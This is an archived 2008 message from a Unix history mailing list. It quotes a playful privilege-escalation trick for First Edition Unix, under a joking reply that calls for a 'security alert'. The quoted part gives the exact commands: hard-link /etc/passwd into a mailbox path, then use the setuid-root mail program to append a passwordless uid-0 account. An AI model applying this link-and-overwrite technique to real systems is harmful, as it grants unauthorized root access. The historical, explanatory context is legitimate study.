[Unix-jun72] [TUHS] Some fun with 1st ed

Larry McVoy lm at bitmover.com
Sat May 3 15:24:00 EDT 2008


We need to send out a security alert immediately.  This is serious.

On Sat, May 03, 2008 at 09:20:13AM -1000, Tim Newsham wrote:
> All work and no play...
> 
> Here's a fun hack for first edition unix.  From MAIL (I) :
> 
>    When followed by the names of a letter and one or more people, the
>    letter is appended to each person's mailbox.  Each letter is
>    preceded by the sender's name and a postmark.
> 
>    A person is either the nameof an entry in the directory /usr, in
>    which case the mail is sent to /usr/person/mailbox, or the path
>    of a directory, in which case mailbox in that directory is used.
> 
> Mail is setuid root:
> 
> # ls -l /bin/mail
>   80 surwr-  1 root   3940 Jan  1 00:00:00 mail
> 
> login as a non-root user (ie "bin"), create a file "letter" with the 
> contents "hack::0:/:".  Run:
> 
>     @ ln /etc/passwd /tmp/mailbox
>     @ mail letter /tmp
> 
> log out and log back in as "hack".  You are now root.  Cat /etc/passwd
> and notice:
> 
>    From bin Jan  1 00:49:22
>    hack::0:/:
> 
> clean up the file a little and enjoy your new elevated status.
> 
> Tim Newsham
> http://www.thenewsh.com/~newsham/
> _______________________________________________
> TUHS mailing list
> TUHS at minnie.tuhs.org
> https://minnie.tuhs.org/mailman/listinfo/tuhs

-- 
---
Larry McVoy                lm at bitmover.com           http://www.bitkeeper.com



More information about the Unix-jun72 mailing list